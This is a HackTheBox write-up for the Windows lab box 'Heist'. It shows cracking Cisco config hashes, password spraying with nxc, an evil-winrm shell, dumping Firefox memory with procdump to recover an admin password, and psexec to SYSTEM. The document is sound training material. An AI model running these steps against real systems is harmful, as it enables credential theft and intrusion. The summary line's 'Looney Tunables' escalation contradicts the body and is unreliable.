WriteupsHTB — Heist
MiscEasyWindows
HTB — Heist
Cisco IOS config file exposed via web portal with hashed passwords. Cracked hashes reused for RPC access, Looney Tunables for escalation.
January 18, 2025HackTheBox
#Cisco#Hash Cracking#RPC#Password Reuse
nmap
sh
map -sC -sV -T4 -A -Pn -p- --open 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.026s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-18T06:13:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 28.24 ms 10.10.14.1
2 28.35 ms 10.10.10.149
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.34 seconds80/tcp open http
sh
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
-
pasting the
isdn switch-type basic-5essin google will reveal cisco
-
pasta the password in google to decrypt
rout3r:$uperP@ssword
admin:Q4)sJu\Y8qz*A3?d
cisco secret 5 hash
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
sh
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
stealth1agent (?) smb
sh
nxc smb 10.10.10.149 -u hazard -p 'stealth1agent'
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent sh
smbclient -L \\\\10.10.10.149 -U 'hazard'
Password for [WORKGROUP\hazard]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC135/tcp open msrpc
sh
135/tcp open msrpc Microsoft Windows RPCsh
rpcclient -U "hazard" 10.10.10.149
Password for [WORKGROUP\hazard]:
rpcclient $> ls
command not found: ls
rpcclient $> srvinfo
10.10.10.149 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003sh
lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
sh
nxc winrm 10.10.10.149 -u users.txt -p passwords.txt --continue-on-success
WINRM 10.10.10.149 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:stealth1agentsh
nxc smb 10.10.10.149 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] Connection Error: Error occurs while reading from remote(104)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent creds
Chase:Q4)sJu\Y8qz*A3?d
evil-winrm
sh
evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'sh
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chasesh
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
2100695f...priv esc
sh
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.sh
*Evil-WinRM* PS C:\Users\Chase> upload /opt/windows/winPEASx64.exesh
ÉÍÍÍÍÍÍÍÍÍ͹ Installed Applications --Via Program Files/Uninstall registry--
È Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Mozilla Firefox
C:\Program Files\PHP
C:\Program Files\Reference Assembliessh
*Evil-WinRM* PS C:\users\chase> Get-Process firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
401 34 40160 101364 1.25 364 1 firefox
347 19 10264 38736 0.08 5608 1 firefox
1075 73 177368 252848 7.44 6088 1 firefox
378 28 24492 61652 0.64 6304 1 firefox
356 25 16416 38920 0.16 6572 1 firefox- upload procdump to dump firefox process
sh
*Evil-WinRM* PS C:\Users\Chase> upload /opt/windows/procdump.exesh
*Evil-WinRM* PS C:\users\chase> download firefox.dmpfirefox process .dmp
sh
strings firefox.dmp | grep "password"
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localization/en-US/toolkit/passwordmgr/passwordManagerList.ftlPK
modules/services-sync/engines/passwords.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.xulPK
chrome/toolkit/content/passwordmgr/recipes.jsonPK
chrome/toolkit/skin/classic/global/passwordmgr.cssPK
chrome/pippki/content/pippki/changepassword.jsPK
chrome/pippki/content/pippki/changepassword.xhtmlPK
chrome/pippki/content/pippki/resetpassword.jsPK
chrome/pippki/content/pippki/resetpassword.xhtmlPK
chrome/pippki/content/pippki/setp12password.jsPK
chrome/pippki/content/pippki/setp12password.xhtmlPK
creds
4dD!5}x/re8]FBuZ
testing against Administrator
sh
nxc smb 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)sh
impacket-psexec administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file OqhiMDuK.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service OZhH on 10.10.10.149.....
[*] Starting service OZhH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemroot.txt
sh
C:\Users\Administrator\Desktop> type root.txt
88cd3661...Up next
EasyJan 2025
HTB — BoardLight
Dolibarr CRM CVE-2023-30253 PHP injection for RCE. Enlightenment window manager SUID binary exploit for local privilege escalation to root.
Read writeup
MediumJan 2025
HTB — Monitored
Nagios XI SNMP credential leak, auth bypass CVE-2023-40931 for API key theft. SQL injection creates admin account for RCE via malicious script.
Read writeup
EasyJan 2025
HTB — Precious
Pdfkit CVE-2022-25765 SSRF/command injection via URL parameter in PDF generation endpoint. Ruby bundler YAML deserialization for root.
Read writeup